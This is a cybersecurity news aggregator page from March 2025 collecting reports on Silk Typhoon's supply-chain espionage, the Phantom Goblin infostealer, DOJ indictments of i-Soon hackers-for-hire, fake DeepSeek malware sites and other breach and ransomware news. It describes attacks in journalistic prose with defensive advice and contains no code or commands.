Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Silk Typhoon Expands ...

 Firewall Daily

The Chinese espionage group known as Silk Typhoon has expanded the cyberattacks to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group’s tactics, highlighting a new focus on commonly used IT solutions such as remote management tools and cloud applications. The   show more ...

group's strategic aim is to gain initial access to victim organizations, allowing them to further infiltrate networks and perform sophisticated espionage operations.  Since 2020, Silk Typhoon has become one of the most formidable Chinese state-backed threat actors. Their activities demonstrate a high level of resourcefulness and technical expertise, allowing them to exploit vulnerabilities rapidly. Their threat intelligence tactics are centered around discovering and leveraging zero-day vulnerabilities in information technology infrastructures, particularly public-facing devices that remain unpatched. Their swift operational tempo and opportunistic approach make them one of the most active and dangerous cyber espionage groups in the world.  While Microsoft has not yet observed Silk Typhoon targeting their cloud services directly, the group exploits unpatched software applications to elevate their access and extend their reach across organizational networks. Once a victim is compromised, the group gains access to sensitive information and tools, using stolen credentials to abuse applications—some of which include Microsoft services—to meet their espionage objectives.  Silk Typhoon Targets a Wide Range of Sectors  The scope of Silk Typhoon’s attacks is expansive, targeting a variety of sectors, including information technology, defense, government, healthcare, energy, legal services, education, and non-governmental organizations (NGOs) across the globe. These attacks are not confined to any specific region, as Silk Typhoon has been observed targeting organizations in both the United States and internationally. Their activity suggests that the group is especially interested in sectors that hold sensitive data or play a critical role in global infrastructure.  Their sophisticated understanding of cloud environments allows them to move laterally through victim networks with ease. This capability helps the group maintain persistence, escalate privileges, and exfiltrate valuable data rapidly. Microsoft Threat Intelligence has tracked the activities of Silk Typhoon since 2020, providing crucial insights into the group’s operational methods, which include using web shells to execute commands and persistently maintain access in compromised environments. Compromise of IT Supply Chains  Recent research from Microsoft Threat Intelligence, which began tracking Silk Typhoon in late 2024, reveals new tactics employed by the group. One of the most interesting changes has been the group’s compromise of the IT supply chain, using stolen API keys and credentials to gain access to third-party service providers. These compromises have given Silk Typhoon a foothold into downstream customer environments. In particular, they have targeted sectors such as privileged access management (PAM), cloud app providers, and cloud data management companies. Once they gain access through these API keys, Silk Typhoon performs reconnaissance on victim devices and harvests valuable data. The group has specifically shown interest in information related to U.S. government policy, law enforcement investigations, and legal processes that are of strategic value to China’s geopolitical interests. Other methods employed by Silk Typhoon during their post-compromise activities include resetting admin accounts, implanting web shells, creating new users, and clearing system logs to hide their tracks.  Password Spray and Abuse  In addition to exploiting software vulnerabilities, Silk Typhoon has demonstrated proficiency in abusing weak password practices to gain access. The group has used password spray attacks, where attackers try commonly used passwords across many accounts, and other password abuse techniques. Silk Typhoon has also been observed conducting reconnaissance using publicly available data, such as leaked corporate passwords found on repositories like GitHub. The exploitation of these vulnerabilities often serves as the first step in Silk Typhoon’s attack chain, granting them initial access to victim environments. Once inside, they proceed with lateral movement tactics, utilizing compromised credentials and stealing data across both on-premises and cloud systems. Notably, Silk Typhoon has been observed targeting Microsoft AADConnect servers, which synchronize on-premises Active Directory with Azure Active Directory (AAD), allowing them to escalate privileges and move between environments.  Cloud Environments and Data Exfiltration  A key aspect of Silk Typhoon’s operations involves infiltrating cloud environments. Once the group has compromised an on-premises environment, they escalate their access to cloud environments by targeting service principals and OAuth applications with administrative permissions. This access enables them to steal email data via MSGraph API, and, in some cases, compromise Exchange Web Services (EWS) to steal email data.  In some cases, Silk Typhoon has been seen creating Entra ID applications designed to mimic legitimate services within the environment, such as Office 365. These efforts are part of their broader strategy to exfiltrate data, move across different tenants, and conduct further espionage activities without detection.  Conclusion  Silk Typhoon's reliance on covert networks, such as the CovertNetwork, which includes compromised devices like Cyberoam appliances, Zyxel routers, and QNAP devices, enables them to obfuscate their activities and maintain a low profile while exfiltrating data from victim environments. As nations and organizations increasingly depend on cloud technologies and complex IT infrastructures, Silk Typhoon’s ability to exploit these systems highlights the need for better cybersecurity defenses.

image for Phantom Goblin: A Ne ...

 Firewall Daily

A new malware campaign named Phantom Goblin, identified and analyzed by Cyble, uses information-stealing malware that uses social engineering techniques to deceive victims and steal sensitive data, including browser credentials and cookies.  The campaign is notable for its use of trusted tools and services like   show more ...

PowerShell and Visual Studio Code (VSCode), which help it evade traditional security mechanisms and establish covert, persistent remote access.  Key Insights into Phantom Goblin  [caption id="attachment_101215" align="alignnone" width="780"] Phantom Goblin Infection Chain (Source: Cyble)[/caption] Phantom Goblin primarily targets browsers and developer tools, leveraging social engineering and malicious scripts to install and operate undetected. According to Cyble Research and Intelligence Labs (CRIL), The malware works by tricking users into executing a disguised LNK file, which then triggers a series of payloads designed to extract and exfiltrate sensitive data.  Social Engineering and Initial Infection: The malware distribution typically begins with a deceptive RAR archive that contains a malicious LNK file. The file is cleverly named to resemble a legitimate document, such as a PDF, prompting users to click on it. When executed, the LNK file runs a PowerShell script, which silently downloads additional payloads from a GitHub repository. This script also ensures persistence by adding itself to the Windows registry, allowing the malware to run each time the system restarts. Exploitation of Browser Vulnerabilities: Once installed, Phantom Goblin turns its attention to web browsers, seeking to extract cookies and login credentials. To do so, it uses a technique that bypasses Chrome’s App Bound Encryption (ABE), enabling it to collect browser data without triggering user alerts. By forcefully terminating active browser processes, the malware ensures that cookie files can be accessed and stolen without any interference. Use of Visual Studio Code (VSCode) Tunnels One of the standout features of Phantom Goblin is its ability to establish unauthorized remote access to infected systems. The malware achieves this by deploying a malicious binary named "vscode.exe," which creates a Visual Studio Code tunnel on the compromised machine. This allows the attackers to control the system remotely while bypassing traditional security mechanisms.  Stealthy Exfiltration via Telegram Phantom Goblin's data exfiltration process is another key component of its covert operation. Using Telegram’s bot API, the malware can send stolen information, including cookies, credentials, and browsing history, to a remote Telegram channel. This technique helps ensure that the stolen data is sent securely and without detection, even as the malware continues to operate on the compromised machine.  Persistence and Evasion Tactics The attackers behind Phantom Goblin take great care to ensure the malware remains undetected and persists on infected systems. The malware’s payloads are designed to appear as legitimate software, such as "updater.exe" or "browser.exe," which further complicates detection by traditional security tools. The use of trusted services like GitHub and PowerShell for downloading additional payloads makes it harder for antivirus software to identify malicious activity. Infection Chain and Malicious Payloads  [caption id="attachment_101217" align="alignnone" width="388"] Malicious LNK File (Source: Cyble)[/caption] The infection process begins with the delivery of an email containing a RAR attachment, which houses the malicious LNK file. Upon execution, the LNK file triggers the PowerShell script that downloads and runs additional payloads. Among these payloads are: Updater.exe: This component focuses on stealing cookies from popular browsers like Chrome, Edge, and Brave. It achieves this by terminating the browser processes and enabling remote debugging to bypass security measures like App Bound Encryption (ABE). Once the cookies are extracted, they are archived and sent to the attacker’s Telegram bot.  Vscode.exe: This binary is responsible for establishing a VSCode tunnel, allowing the attackers to remotely access the infected system. The malware manipulates VSCode's legitimate update process to maintain a cover, ensuring that it can establish a hidden backdoor into the victim’s machine.  Browser.exe: This payload gathers a variety of sensitive information, including browsing history, login credentials, and session data. By targeting a wide range of browsers, it ensures that a broad swath of personal data is collected from the victim’s system.  Defense Against Phantom Goblin  To protect systems from Phantom Goblin and similar threats, experts recommend several best practices:  Email Filtering: Implement advanced filtering techniques to block suspicious attachments, particularly those in RAR, ZIP, or LNK formats. Scanning all attachments with up-to-date antivirus software before opening them is crucial.  Disabling VSCode Tunnels: Restrict the use of Visual Studio Code tunneling for unauthorized users by enforcing access controls and authentication mechanisms. Limiting the ability to run VSCode on sensitive systems can help prevent remote access.  PowerShell Restrictions: Disable or restrict the use of PowerShell and script execution on systems unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as the execution of scripts from external repositories, can help detect and block malicious actions.  Browser Security: Implement strong browser security measures to prevent unauthorized debugging and to restrict access to sensitive data stored within browsers. Enforcing multi-factor authentication (MFA) and session timeouts can help further protect browser-based credentials.  Endpoint Protection: Deploy endpoint protection solutions that include real-time threat detection for malicious processes, registry changes, and unusual file downloads.  Conclusion  Phantom Goblin highlights how cybercriminals use social engineering and trusted tools to bypass security measures and steal sensitive data. By exploiting vulnerabilities in browsers and developer tools, and leveraging remote access through Visual Studio Code tunnels, the attackers remain undetected and persistent. Cyble’s cutting-edge products and solutions, including Cyble Vision and Cyble Hawk, provide AI-driven threat intelligence and proactive security measures to help organizations detect, prevent, and respond to cyber threats, ensuring better defense against attacks like Phantom Goblin.

image for Massive Cybercrime B ...

 Cyber News

The United States Department of Justice (DOJ) has taken action against a major cyber threat, opening indictments against 12 Chinese nationals, including two officers from China’s Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon. This move is part of a coordinated effort   show more ...

to stop global cybercrime and protect critical U.S. infrastructure from foreign attacks. Crackdown on Cybercrime On Wednesday, the DOJ announced charges against Zhou Shuai, Yin Kecheng, and eight employees of i-Soon, a company allegedly engaged in a cybeattack. According to the U.S. government, these individuals participated in a hacking campaign targeting key sectors such as defense, healthcare, communications, and government agencies. Alongside the indictments, the U.S. government also imposed sanctions on Zhou Shuai and his company, Shanghai Heiying Information Technology Company. Zhou is accused of illegally obtaining and selling sensitive data from U.S. infrastructure networks. The Department of State’s spokesperson, Tammy Bruce, emphasized that Zhou's actions risked national security and violated international norms regarding cyber activities. Hacker-for-Hire Operations Exposed The indictments shed light on China's extensive hacker-for-hire ecosystem, which allegedly operates under the direction of the Ministry of Public Security (MPS) and the Ministry of State Security (MSS). The DOJ, Federal Bureau of Investigation (FBI), Naval Criminal Investigative Service (NCIS), and Departments of State and Treasury collaborated to expose these cyber operations. According to court documents, the accused hackers engaged in cyber intrusions for profit, either independently or at the behest of Chinese intelligence agencies. Their targets included U.S. critics of the Chinese Communist Party (CCP), a religious organization in the U.S., foreign ministries of Asian governments, and multiple American federal and state agencies, including the U.S. Department of the Treasury. Assistant Director Bryan Vorndran of the FBI’s Cyber Division stated, "The FBI is committed to protecting Americans from foreign cyber-attacks. Today’s announcements reveal that the Chinese Ministry of Public Security has been paying hackers-for-hire to inflict digital harm on Americans who criticize the Chinese Communist Party." The Scope of Cyber Intrusions The DOJ’s investigation revealed an extensive network of private companies and contractors in China engaged in state-sponsored hacking. These entities worked to obscure the PRC government's involvement while conducting cyber intrusions, stealing information, and selling it for profit. The hackers often targeted victims indiscriminately, leading to widespread vulnerabilities and potential threats to global cybersecurity. The stolen data was either handed over to Chinese government agencies or sold to third parties, exacerbating security risks. This reckless approach not only violated privacy rights but also left countless systems vulnerable to future attacks. Indictments and Arrest Warrants In the Southern District of New York, federal courts opened indictments against eight i-Soon employees and two MPS officers for conducting cyberattacks from 2016 to 2023. The DOJ also seized i-Soon’s primary internet domain, disrupting the company’s operations. Acting U.S. Attorney Matthew Podolsky for the Southern District of New York highlighted the severity of the charges, stating, "For years, these 10 defendants—including two PRC officials—used sophisticated hacking techniques to target religious organizations, journalists, and government agencies. These charges will help stop these state-sponsored hackers and protect our national security." The FBI has issued arrest warrants for the indicted individuals, who remain at large. In a parallel move, the U.S. Department of State’s Rewards for Justice (RFJ) program has announced a reward of up to $10 million for information leading to the identification or location of individuals engaged in malicious cyber activities on behalf of a foreign government. The ten wanted individuals include: Wu Haibo (CEO of i-Soon) Chen Cheng (COO of i-Soon) Wang Zhe (Sales Director) Liang Guodong, Ma Li, Wang Yan, Xu Liang, Zhou Weiwei (Technical Staff) Wang Liyu, Sheng Jing (MPS Officers) The defendants are accused of generating millions in revenue through their hacking services. i-Soon allegedly charged between $10,000 and $75,000 per successfully exploited email account and trained Chinese government officials in cyber intrusion techniques. Targeted Organizations and Global Impact The indictment reveals that i-Soon targeted various organizations critical of the Chinese government. These included: A large U.S.-based religious organization previously active in China U.S. news outlets critical of the CCP The New York State Assembly Human rights and religious freedom organizations Foreign ministries in Taiwan, India, South Korea, and Indonesia A Hong Kong-based newspaper opposing the Chinese government These attacks not only affected the United States but also had a significant global impact, raising concerns among international allies about China's cyber operations. Actions Against APT27 Group In a separate indictment unsealed in the District of Columbia, Yin Kecheng and Zhou Shuai were charged for their involvement in a decade-long hacking campaign linked to the cyber threat group Advanced Persistent Threat 27 (APT27). The FBI has issued wanted posters for both individuals, who remain in China. The U.S. Department of State’s Bureau of International Narcotics and Law Enforcement Affairs has announced a $2 million reward for information leading to their arrests. Interim U.S. Attorney Edward R. Martin Jr. for the District of Columbia remarked, "These indictments show our commitment to holding Chinese hackers accountable. The defendants have been hacking for the Chinese government for years, and we demand that the PRC stop protecting these cybercriminals." As cyber threats continue to evolve, experts believe that governments worldwide must take proactive steps to address vulnerabilities and hold malicious actors accountable. The latest indictments mark a major step in the fight against state-sponsored cybercrime, sending a clear message that the U.S. will not tolerate foreign-backed hacking operations.

image for Attackers distributi ...

 News

In early 2025, the Chinese chatbot, DeepSeek, burst onto the AI scene. It provoked much comment and controversy across the globe: we could hardly fail to spot the similarity of its logo to our own, comparisons with ChatGPT were abundant, and in Italy, South Korea, Australia, and other countries, DeepSeek was blocked   show more ...

altogether. The hype was — and remains — intense, including among cybercriminals. Weve discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on Malicious scripts and geofencing Several malware distribution schemes were detected, all of which had the use of fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post thoroughly explores one of these schemes; for details on the others, see our full report on Securelist. What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? Youd probably assume you could find there some DeepSeek-related software. And what kind of software might that be? A DeepSeek client, of course! And indeed, youll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site. Fake DeepSeek web page Whichever of these buttons you click, an installer starts downloading. But theres a catch: once initiated, instead of installing DeepSeek, the installer accesses malicious URLs, and manipulates scripts to activate the SSH service in Windows to configure it to work with the attackers keys. This enables them to remotely connect to the victims computer, who doesnt even get a DeepSeek Windows client as consolation which, by the way, doesnt exist. Interestingly, the fake sites use geofencing — restricting access based on the region of the IP address. For example, users from Russia on these domains saw a simple stub site with empty texts about DeepSeek — most likely generated by DeepSeek itself or a different large language model. Visitors from other countries, however, were taken to the malicious site distributing the fake client. A million views on X The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, open sources say, has no more than 10 employees. The companys account itself is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 subscribers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. Bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, its quite possible that Lumina Vistas account was simply hacked and used for paid promotion of the attackers ad post. 1.2 million views in a near-empty account? Smells like paid promotion In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority — the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. However, none of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally but that requires specialized software. How to use AI safely At present, its not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is for certain: these campaigns are massive and not targeted at specific users. Yet theyre developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com, and from v3-deepseek[.]com! Indeed, Grok, DeepSeek – whats the difference? Without reliable protection, any AI enthusiast is at risk. Thats why its vital to follow the safety rules and recommendations when using AI. Check the URLs of websites you visit. Especially when its something new, popular, and easy to spoof. Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking. Protect your devices. Check out the reviews and choose the best solution for you that will spot phishing sites and guard against downloading malware. Limit the use of third-party plugins. Every add-on app creates new threats. Special monitoring is required for execution plug-ins that can, for example, run malicious code to buy a plane ticket at your expense. If youre seriously interested in neural networks and want to learn how to use them safely, check out these posts: How to use ChatGPT, Gemini, DeepSeek and other AI securely How to install and use an AI assistant on your computer How hackers can read your chats with ChatGPT or Microsoft Copilot … and many others.

image for Enterprise AI Throug ...

 Feed

Recently, 57 countries signed an agreement pledging an "open" and "inclusive" approach to AI's development. The US and UK were not among them, with the US vice president implying productivity should be the priority over safety. Should the opportunity for AI to drive innovation and productivity be prioritized over safety and security?

 Feed

The U.S. Department of Justice (DoJ) has announced charges against 12 Chinese nationals for their alleged participation in a wide-ranging scheme designed to steal data and suppress free speech and dissent globally. The individuals include two officers of the People's Republic of China's (PRC) Ministry of Public Security (MPS), eight employees of an ostensibly private PRC company, Anxun

 Feed

Over 1,000 websites powered by WordPress have been infected with a third-party JavaScript code that injects four separate backdoors. "Creating four backdoors facilitates the attackers having multiple points of re-entry should one be detected and removed," c/side researcher Himanshu Anand said in a Wednesday analysis. The malicious JavaScript code has been found to be served via cdn.csyndication[

 Feed

Elastic has rolled out security updates to address a critical security flaw impacting the Kibana data visualization dashboard software for Elasticsearch that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-25012, carries a CVSS score of 9.9 out of a maximum of 10.0. It has been described as a case of prototype pollution. "Prototype pollution in Kibana leads to

 Feed

The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT. "EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions," Outpost24 KrakenLabs said in a new report shared with The

 Feed

Cyber threats are growing more sophisticated, and traditional security approaches struggle to keep up. Organizations can no longer rely on periodic assessments or static vulnerability lists to stay secure. Instead, they need a dynamic approach that provides real-time insights into how attackers move through their environment. This is where attack graphs come in. By mapping potential attack paths

 Feed

The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024. In the first two months of 2025 alone, the group has claimed over 40 attacks, according to data from the Symantec Threat Hunter Team said in a report shared with The Hacker News. The

 Law & order

Journey with us to Myanmar's shadowy scam factories, where trafficked workers are forced to run romance-baiting and fake tech support scams, and find out why a company's mandatory hold time for tech support could lead to innocent users having their computers compromised. All this and more is discussed in the   show more ...

latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus - don't miss our featured interview with Acronis CISO Gerald Beuchelt!

 Advanced Data Protection

Source: www.techrepublic.com – Author: Fiona Jackson Apple told TechRepublic it is “gravely disappointed” to remove Advanced Data Protection in the U.K., as it fights government demands for an iCloud backdoor. Image: TheClimateGroup/Creative Commons (2014) Apple is taking legal action against the U.K.   show more ...

government over demands to weaken its strongest cloud security measures, arguing that compliance […] La entrada Why is Apple Taking Legal Action Against UK’s Government? – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.techrepublic.com – Author: Megan Crouse The problem started with Manifest V3, Chrome’s new extension specification, which is supposed to improve privacy. Google’s latest crackdown on browser extension has rendered popular ad blockers like uBlock Origin inoperable on Chrome, as the company pushes   show more ...

forward with its switch to Manifest V3. The move, which critics say […] La entrada Google Cuts Off uBlock Origin on Chrome as Firefox Stands Firm on Ad Blockers – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 APT 27

Source: www.securityweek.com – Author: Ryan Naraine The US Justice Department on Wednesday unsealed indictments charging employees of a Chinese cybersecurity firm known as i-Soon (Anxun Information Technology) with conducting extensive hacking campaigns on behalf of Beijing’s security services. Prosecutors   show more ...

say i-Soon employees acted as “hackers-for-hire,” breaching email networks, government databases, and corporate systems at the […] La entrada US Indicts China’s iSoon ‘Hackers-for-Hire’ Operatives  – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Eduard Kovacs Many organizations are still concerned that patching operational technology (OT) systems can lead to equipment downtime and operational disruptions, and consequently they do not conduct regular patching, according to cyber-physical security firm TXOne   show more ...

Networks.  The data comes from TXOne’s 2024 Annual OT/ICS Cybersecurity Report, which is based on a […] La entrada Organizations Still Not Patching OT Due to Disruption Concerns: Survey – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Active Directory

Source: www.securityweek.com – Author: Ryan Naraine SpecterOps, a security startup selling technology to secure Microsoft’s Active Directory (AD) and Azure AD deployments, has raised an unusually large $75 million Series B funding round to accelerate the growth of its BloodHound Enterprise platform.  The   show more ...

company said the investment was led by Insight Partners. Venture capital outfits […] La entrada SpecterOps Scores $75M Series B to Scale BloodHound Enterprise Platform  – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BeyondTrust

Source: www.securityweek.com – Author: Ryan Naraine Microsoft threat hunters warned Wednesday of a significant shift in tactics by Silk Typhoon, a Chinese government espionage group linked to recent US Treasury hacks. The group is now targeting companies in the global IT supply chain, including IT services,   show more ...

remote monitoring and management firms and managed service providers. […] La entrada China Hackers Behind US Treasury Breach Caught Targeting IT Supply Chain – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Ionut Arghire Proofpoint warns of a highly targeted campaign targeting several United Arab Emirates organizations across multiple sectors with a new backdoor. The attacks, attributed to an Iranian threat actor tracked as UNK_CraftyCamel, employed polyglot files to hide the   show more ...

malicious payload, a technique relatively uncommon in espionage attacks. The threat actor, […] La entrada Iranian Hackers Target UAE Firms With Polyglot Files – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Ionut Arghire A network of North Korean fake IT workers has been creating personas on GitHub to obtain remote engineering and full-stack blockchain developer positions in the US and Japan, threat monitoring firm Nisos warns. The GitHub personas, which are reusing matured   show more ...

GitHub accounts and portfolio content, claim to be in […] La entrada North Korean Fake IT Workers Pose as Blockchain Developers on GitHub – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 arrested

Source: www.securityweek.com – Author: Eduard Kovacs The US Justice Department announced on Tuesday that two Venezuelan nationals were arrested and charged recently over their role in an ATM jackpotting scheme. In ATM jackpotting attacks, an ATM is hacked by installing a piece of malware on its hard drive or by   show more ...

replacing the drive with an […] La entrada Two Venezuelans Arrested in US for ATM Jackpotting – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Ionut Arghire A ransomware gang has claimed responsibility for an attack on Indian engineering firm Tata Technologies, threatening to leak 1.4 terabytes of data allegedly stolen from the company. The data appears to have been stolen in an incident that the subsidiary of   show more ...

Tata Motors disclosed in a regulatory filing with […] La entrada Ransomware Group Claims Attack on Tata Technologies – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0CISO2CISO

On Feb. 3, 2025, a transformative STEM outreach event for more than 25 female students took place at Whirlpool’s manufacturing plant in Puducherry, India. Source Views: 0 La entrada Inspiring the Future: STEM Outreach Program for Young Female Students se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 APT

Source: securityaffairs.com – Author: Pierluigi Paganini Microsoft warns that China-backed APT Silk Typhoon linked to US Treasury hack, is now targeting global IT supply chains, using IT firms to spy and move laterally. Microsoft reported that China-linked APT group Silk Typhoon has shifted tactics to target IT   show more ...

solutions like remote management tools and cloud apps […] La entrada China-linked APT Silk Typhoon targets IT Supply Chain – Source: securityaffairs.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Charges

Source: www.techrepublic.com – Author: Fiona Jackson Image: BirgitKorber, Getty Images/iStockphoto The Justice Department has charged 12 Chinese nationals for their alleged involvement in global hacker-for-hire activities. According to court documents, targets included the U.S. Treasury Department, journalists,   show more ...

and religious organisations. The attacks aimed to steal data and suppress free speech. The indictment names two officers […] La entrada DoJ Busts Alleged Global Hacking-for-Hire Network of ‘Cyber Mercenaries’ – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Blockchain

Source: www.techrepublic.com – Author: TechRepublic Academy Published March 6, 2025 We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details. In this online training course, learn about   show more ...

NFTs, blockchain, decentralized apps, and more. […] La entrada Save 70% on a Course Showing You How to Invest in Crypto – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Connor Jones Toronto Zoo’s final update on its January 2024 cyberattack arrived this week, revealing that visitor data going back to 2000 had been compromised. It said everyone who purchased a general admission ticket or zoo membership between 2000 and April 2023 had   show more ...

their personal data stolen by ransomware crooks in […] La entrada Toronto Zoo ransomware crooks snatch decades of visitor data – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Connor Jones It will cost upward of $75 million to address the cybersecurity needs of rural US hospitals, Microsoft reckons, as mounting closures threaten the lives of Americans. Hospitals are routinely targeted by cybercriminals because system availability is acutely linked   show more ...

to mortality rates, and rural facilities are often the least secure […] La entrada Up to $75M needed to fix up rural hospital cybersecurity as ransomware gangs keep scratching at the door – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Iain Thomson Eric Gan is no longer CEO of AI security biz Cybereason after what appears to have been a protracted and unpleasant fight with investors, including the SoftBank Vision Fund and Liberty Strategic Capital. Gan, a former SoftBank executive, came aboard as chief   show more ...

exec in April 2023 after the outfit’s […] La entrada Cybereason CEO leaves after months of boardroom blowups – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Charge

Source: go.theregister.com – Author: Jessica Lyons US government agencies announced Wednesday criminal charges against alleged members of China’s Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government   show more ...

agencies and other major orgs. “For years, the PRC government [People’s Republic of China] […] La entrada Feds name and charge alleged Silk Typhoon spies behind years of China-on-US attacks – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Iain Thomson Video Looming staffing cuts to America’s security and intelligence agencies, if carried out, would “have a devastating effect on cybersecurity and our national security,” former NSA bigwig Rob Joyce has told House representatives. Speaking on   show more ...

Wednesday to the House Select Committee on the Chinese Communist Party, Joyce said the […] La entrada Ex-NSA grandee says Trump’s staff cuts will ‘devastate’ America’s national security – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Connor Jones Qilin – the “no regrets” ransomware crew wreaking havoc on the global healthcare industry – just claimed responsibility for fresh attacks on a cancer treatment clinic in Japan and a women’s healthcare facility in the US. Qilin: We knew our   show more ...

Synnovis attack would cause a healthcare crisis at London […] La entrada Qilin ransomware gang boasts of cyberattacks on cancer clinic, Ob-Gyn facility – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2025-03
Aggregator history
Thursday, March 06
SAT
SUN
MON
TUE
WED
THU
FRI
MarchAprilMay